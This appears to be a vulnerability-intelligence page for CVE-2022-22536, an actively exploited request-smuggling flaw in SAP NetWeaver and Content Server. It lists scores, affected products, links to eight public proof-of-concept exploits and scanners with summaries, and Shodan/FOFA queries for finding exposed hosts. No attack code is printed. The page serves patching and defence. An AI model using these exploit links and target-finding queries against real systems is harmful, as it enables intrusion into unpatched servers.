CVE-2022-22536

CRITICAL KEV NUCLEI

SAP Content Server 7.53 - Unauthenticated HTTP Request Smuggling

Title source: llm

Exploitation Summary

CVE-2022-22536 is actively exploited and listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, added August 18, 2022. EIP tracks 8 public exploits from researchers including C41Tx90, ZZ-SOCMAP, tess-ss. A Nuclei detection template is also available.

AI-analyzed exploit summary This exploit demonstrates HTTP request smuggling (CVE-2022-22536) in SAP NetWeaver by crafting a malicious request with a mismatched Content-Length header to bypass ACLs and access internal endpoints. It includes a Python script to automate the attack and test multiple paths for vulnerability.

Description

SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.

Exploits (8)

exploitdb WORKING POC

by C41Tx90 · textremotemultiple

https://www.exploit-db.com/exploits/52109

View Code ZIP pw:eip

This exploit demonstrates HTTP request smuggling (CVE-2022-22536) in SAP NetWeaver by crafting a malicious request with a mismatched Content-Length header to bypass ACLs and access internal endpoints. It includes a Python script to automate the attack and test multiple paths for vulnerability.

Classification

Working Poc 95%

Attack Type

Auth Bypass

Complexity

Moderate

Reliability

Reliable

Target: SAP NetWeaver Application Server ABAP/Java, ABAP Platform, SAP Content Server 7.53, SAP Web Dispatcher

No auth needed

Prerequisites: Network access to the SAP NetWeaver server · SAP NetWeaver with vulnerable configuration

MITRE ATT&CK

T1189 - Drive-by Compromise T1190 - Exploit Public-Facing Application

devstral-2 · analyzed Feb 16, 2026 Full analysis →

nomisec WORKING POC 51 stars

by ZZ-SOCMAP · poc

https://github.com/ZZ-SOCMAP/CVE-2022-22536

View Code ZIP pw:eip

This PoC exploits CVE-2022-22536, a DoS vulnerability in SAP Internet Communication Manager (ICM) via a crafted HTTP request with excessive padding. It checks for vulnerability by sending a malformed request and analyzing the response count and status codes.

Classification

Working Poc 95%

Attack Type

Dos

Complexity

Moderate

Reliability

Reliable

Target: SAP Internet Communication Manager (ICM)

No auth needed

Prerequisites: Network access to the target SAP ICM server

MITRE ATT&CK

T1499 - Endpoint Denial of Service

devstral-2 · analyzed Feb 16, 2026 Full analysis →

nomisec WORKING POC 10 stars

by tess-ss · poc

https://github.com/tess-ss/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536

View Code ZIP pw:eip

This repository provides a proof-of-concept for CVE-2022-22536, a request smuggling vulnerability in SAP NetWeaver and related products. The exploit leverages HTTP desynchronization to poison intermediary caches, potentially leading to credential theft or unauthorized actions.

Classification

Working Poc 90%

Attack Type

Other

Complexity

Moderate

Reliability

Reliable

Target: SAP NetWeaver Application Server ABAP/Java, ABAP Platform, SAP Content Server 7.53, SAP Web Dispatcher

No auth needed

Prerequisites: Network access to the target SAP system · Intermediary proxy vulnerable to desynchronization

MITRE ATT&CK

T1189 - Drive-by Compromise T1190 - Exploit Public-Facing Application

devstral-2 · analyzed Feb 16, 2026 Full analysis →

nomisec WORKING POC 1 stars

by BecodoExploit-mrCAT · infoleak

https://github.com/BecodoExploit-mrCAT/SAPGateBreaker-Exploit

View Code ZIP pw:eip

This repository contains a functional Python-based proof-of-concept exploit for CVE-2022-22536, demonstrating HTTP request smuggling in SAP NetWeaver Application Server. The exploit leverages Content-Length manipulation to bypass access controls and access internal endpoints.

Classification

Working Poc 95%

Attack Type

Auth Bypass

Complexity

Moderate

Reliability

Reliable

Target: SAP NetWeaver Application Server ABAP/Java, ABAP Platform, SAP Content Server 7.53, SAP Web Dispatcher

No auth needed

Prerequisites: Network access to the target SAP NetWeaver instance · Knowledge of internal SAP endpoints to target

MITRE ATT&CK

T1189 - Drive-by Compromise T1190 - Exploit Public-Facing Application

devstral-2 · analyzed Feb 16, 2026 Full analysis →

nomisec SCANNER

by abrewer251 · infoleak

https://github.com/abrewer251/CVE-2022-22536_SAP_Request_Smuggling_Scanner

View Code ZIP pw:eip

This repository contains a Python-based scanner for CVE-2022-22536, a critical request smuggling vulnerability in SAP Internet Communication Manager (ICM) and SAP Web Dispatcher. The scanner tests multiple hosts in parallel for protocol desynchronization behavior by sending crafted HTTP requests and analyzing responses.

Classification

Scanner 95%

Attack Type

Other

Complexity

Moderate

Reliability

Reliable

Target: SAP Internet Communication Manager (ICM) and SAP Web Dispatcher

No auth needed

Prerequisites: List of target IPs/ports · Network access to target systems

MITRE ATT&CK

T1190 - Exploit Public-Facing Application

devstral-2 · analyzed Feb 16, 2026 Full analysis →

inthewild WRITEUP

poc

https://github.com/tes5hacks/sap-memory-pipes-desynchronization-vulnerability-mpi-cve-2022-22536

View Code ZIP pw:eip

The repository provides a detailed technical explanation of CVE-2022-22536, a request smuggling vulnerability in SAP NetWeaver and related components. It includes a proof-of-concept HTTP request demonstrating the desynchronization attack but lacks functional exploit code.

Classification

Writeup 90%

Attack Type

Other

Complexity

Moderate

Reliability

Theoretical

Target: SAP NetWeaver Application Server ABAP/Java, ABAP Platform, SAP Content Server 7.53, SAP Web Dispatcher

No auth needed

Prerequisites: network access to vulnerable SAP server · intermediary proxy vulnerable to desynchronization

MITRE ATT&CK

T1190 - Exploit Public-Facing Application

devstral-2 · analyzed Feb 23, 2026 Full analysis →

inthewild WORKING POC

poc

https://github.com/asurti6783/sap-memory-pipes-desynchronization-vulnerability-mpi-cve-2022-22536

View Code ZIP pw:eip

This repository provides a functional proof-of-concept for CVE-2022-22536, demonstrating request smuggling and cache poisoning in SAP NetWeaver via desynchronization of memory pipes. The PoC includes a crafted HTTP request with a large Content-Length header to exploit the vulnerability.

Classification

Working Poc 90%

Attack Type

Other

Complexity

Moderate

Reliability

Reliable

Target: SAP NetWeaver Application Server ABAP/Java, ABAP Platform, SAP Content Server 7.53, SAP Web Dispatcher

No auth needed

Prerequisites: Access to the target SAP server · Ability to send crafted HTTP requests

MITRE ATT&CK

T1190 - Exploit Public-Facing Application

devstral-2 · analyzed Feb 23, 2026 Full analysis →

inthewild WORKING POC

poc

https://github.com/antx-code/cve-2022-22536

View Code ZIP pw:eip

This repository contains a functional PoC for CVE-2022-22536, a vulnerability in SAP NetWeaver AS JAVA (LM Configuration Wizard). The exploit crafts a malformed HTTP request with excessive padding to trigger a DoS condition by causing the server to respond with multiple HTTP responses.

Classification

Working Poc 95%

Attack Type

Dos

Complexity

Moderate

Reliability

Reliable

Target: SAP NetWeaver AS JAVA (LM Configuration Wizard) versions 7.30, 7.31, 7.40, 7.50

No auth needed

Prerequisites: Network access to the target SAP server · Target server must be running a vulnerable version of SAP NetWeaver AS JAVA

MITRE ATT&CK

T1499 - Endpoint Denial of Service

devstral-2 · analyzed Feb 23, 2026 Full analysis →

Nuclei Templates (1)

SAP Memory Pipes (MPI) Desynchronization

CRITICALby pdteam

Shodan: http.favicon.hash:-266008933

FOFA: icon_hash=-266008933

References (3)

Core 3

Core References

Permissions Required x_refsource_misc

https://launchpad.support.sap.com/#/notes/3123396

Broken Link, Not Applicable, Vendor Advisory x_refsource_misc

https://www.sap.com/documents/2022/02/fa865ea4-167e-0010-bca6-c68f7e60039b.html

US Government Resource

https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-22536

Scores

CVSS v3 10.0

EPSS 0.9383

EPSS Percentile 99.9%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CISA SSVC

Vulnrichment

Exploitation active

Automatable yes

Technical Impact total

Details

CISA KEV 2022-08-18

VulnCheck KEV 2022-08-18

InTheWild.io 2022-08-18

ENISA EUVD EUVD-2022-27682

CWE

CWE-444

Status published

Products (26)

sap/content_server 7.53

sap/netweaver_application_server_abap 7.22

sap/netweaver_application_server_abap 7.49

sap/netweaver_application_server_abap 7.53

sap/netweaver_application_server_abap 7.77

sap/netweaver_application_server_abap 7.81

sap/netweaver_application_server_abap 7.85

sap/netweaver_application_server_abap 7.86

sap/netweaver_application_server_abap 7.87

sap/netweaver_application_server_abap 8.04

... and 16 more

Published Feb 09, 2022

KEV Added Aug 18, 2022

Tracked Since Feb 18, 2026